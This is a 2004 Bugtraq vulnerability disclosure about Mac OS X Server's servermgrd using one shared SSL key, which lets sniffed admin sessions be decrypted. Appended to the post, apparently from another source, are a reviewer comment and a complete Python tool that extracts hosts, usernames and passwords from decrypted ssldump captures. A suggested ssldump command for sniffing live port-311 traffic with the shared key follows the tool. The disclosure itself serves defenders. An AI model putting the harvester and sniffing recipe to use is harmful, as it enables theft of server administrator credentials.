Message-ID: <E0E79C13-17DF-11D9-ABF1-000A95DF2556@mac.com>
Date: Wed, 6 Oct 2004 15:37:10 -0600
From: Michael Bartosh <mbartosh@....com>
To: bugtraq@...urityfocus.com
Subject: Latest Apple Sec update
Submitted this to Apple product security ~3 weeks ago; fixed in the latest sec update a couple of days ago.
servermgrd is a modified version of apache used by Apple in Mac OS X Server as a management back end. It uses SSL for encryption. Out of the box, every install of Mac OS X Server uses the same private key (pasting it here since its wide distribution cannot feasibly be called private).
[SNIP]
Using the ssldump (http://www.rtfm.com/ssldump/) utility* I've several times in the last week sat on wireless networks and obtained administrative passwords for several Mac OS X Servers. I've long figured this was possible but did not really look into it until I had to finish that chapter of my book (O'Reilly's Mac OS X Server book). The decrypted packet looks like this:
12 10 0.4775 (0.0007) C>S application_data
---------------------------------------------------------------
POST /commands/servermgr_info HTTP/1.0
Host: gs.4am-media.com:311
Authorization: Basic xxxxxxxxxxxxxx
HTTP_USER_AGENT: CFNetwork-ServerManagerDaemonSession
Content-Length: 0
...where xxxxxxxxxxxxxx is the base64 encoded version of the password specified at login.
We must assume every packet on every network is likely to be sniffed. For the price of $500 anyone anywhere can obtain the private key used to administer tens of thousands of servers. At the very least this should be widely documented, yet a search at apple.com/support for servermgrd and Server Admin SSL yields nothing. This is very briefly hinted at on page 17 of the Command Line Administration Guide. This text, though, is misleading at best in its failure to advertise the rather insecure out of box state of servermgrd.
[SNIP]
*Note: trivial diff to get it to build on Mac OS X
crap:~/Desktop/ssldump-0.9b3 mab9718$ diff configure configure.orig
1213,1215d1212
< if test -f $dir/libssl.dylib -a -f $dir/libcrypto.dylib;
then
< found_ssl="true"
< fi
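Review bot: the diff was generated as `diff configure configure.orig`, so the three `<` lines (1213,1215d1212) are the lines present in the patched configure and absent from the original, i.e. additions, not removals; anyone feeding it to `patch` would need `-R`, or it should be regenerated with the arguments swapped so the lines show as `>` / `1212a1213,1215`. The bare `then` is a wrapped continuation of the `< if test -f $dir/libssl.dylib -a -f $dir/libcrypto.dylib;` line, since the hunk header accounts for exactly three lines.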
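The post's point is that once the shared servermgrd key is known, ssldump reduces the management session to plain HTTP, and the Server Admin password is sitting in a Basic Authorization header. The following is an added example, not the poster's code, that parses decrypted-session output in the record layout shown above and pulls out host/credential pairs, skipping non-Basic or corrupt headers. The sample capture, host name, account and password embedded in it are constructed for the example; the record format and header names mirror the post. The ssldump invocation in the usage note is assumed, not taken from the post.

```python
"""Harvest HTTP Basic credentials from ssldump-style decrypted application_data records."""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample in the layout shown in the post. The host, account and
# password are made up ("YWRtaW46czNjcmV0" is base64 of "admin:s3cret");
# the third record carries a deliberately corrupt token.
SAMPLE_SSLDUMP = """\
New TCP connection #12: 10.0.0.5(49152) <-> gs.example.com(311)
12 10 0.4775 (0.0007) C>S application_data
---------------------------------------------------------------
POST /commands/servermgr_info HTTP/1.0
Host: gs.example.com:311
Authorization: Basic YWRtaW46czNjcmV0
HTTP_USER_AGENT: CFNetwork-ServerManagerDaemonSession
Content-Length: 0

---------------------------------------------------------------
12 11 0.4801 (0.0026) S>C application_data
---------------------------------------------------------------
HTTP/1.0 200 OK
Content-Type: text/plain

---------------------------------------------------------------
12 12 0.5000 (0.0199) C>S application_data
---------------------------------------------------------------
GET /commands/servermgr_info HTTP/1.0
Host: gs.example.com:311
Authorization: Basic %%%notbase64
Content-Length: 0

---------------------------------------------------------------
"""

# "<conn> <rec> <time> (<delta>) C>S application_data"
RECORD_RE = re.compile(
    r"^\d+\s+\d+\s+[\d.]+\s+\([\d.]+\)\s+(C>S|S>C)\s+application_data\s*$"
)


def split_records(text: str) -> List[Tuple[str, List[str]]]:
    """Return (direction, body_lines) for every application_data record.

    A record is a header line, a dashed separator, the payload, and a
    closing dashed separator; anything outside that structure is ignored.
    """
    records: List[Tuple[str, List[str]]] = []
    direction: Optional[str] = None
    body: Optional[List[str]] = None
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            direction, body = m.group(1), None
            continue
        if line.startswith("---"):
            if body is None and direction is not None:
                body = []                      # opening separator
            elif body is not None:
                records.append((direction, body))  # closing separator
                direction, body = None, None
            continue
        if body is not None:
            body.append(line)
    return records


def header_value(body: List[str], name: str) -> Optional[str]:
    """Case-insensitive lookup of an HTTP header in the request head."""
    for line in body:
        if not line:                           # blank line ends the headers
            break
        key, _, value = line.partition(":")
        if key.strip().lower() == name.lower():
            return value.strip()
    return None


def basic_credentials(body: List[str]) -> Optional[Tuple[str, str]]:
    """Decode an 'Authorization: Basic' header to (user, password).

    Returns None for a missing header, a different scheme, or a token that
    is not valid base64 / UTF-8, so one bad record never aborts a run.
    """
    auth = header_value(body, "Authorization")
    if auth is None:
        return None
    scheme, _, token = auth.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    user, _, password = decoded.partition(":")
    return user, password


def harvest(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Map Host header -> credentials seen in client-to-server records."""
    found: Dict[str, List[Tuple[str, str]]] = {}
    for direction, body in split_records(text):
        if direction != "C>S":
            continue
        creds = basic_credentials(body)
        if creds is None:
            continue
        host = header_value(body, "Host") or "?"
        found.setdefault(host, []).append(creds)
    return found


if __name__ == "__main__":
    for host, creds in harvest(SAMPLE_SSLDUMP).items():
        for user, password in creds:
            print(f"{host}\t{user}\t{password}")
```

Assumed invocation to produce such output against a live capture would be along the lines of `ssldump -A -d -k servermgrd.key -i en1 port 311`, with the shared key saved in PEM form; the decoded records are then fed to `harvest()`. The same parser flags the fix: once a site has generated its own key pair, captures of port 311 no longer decrypt and `split_records()` finds no application_data bodies.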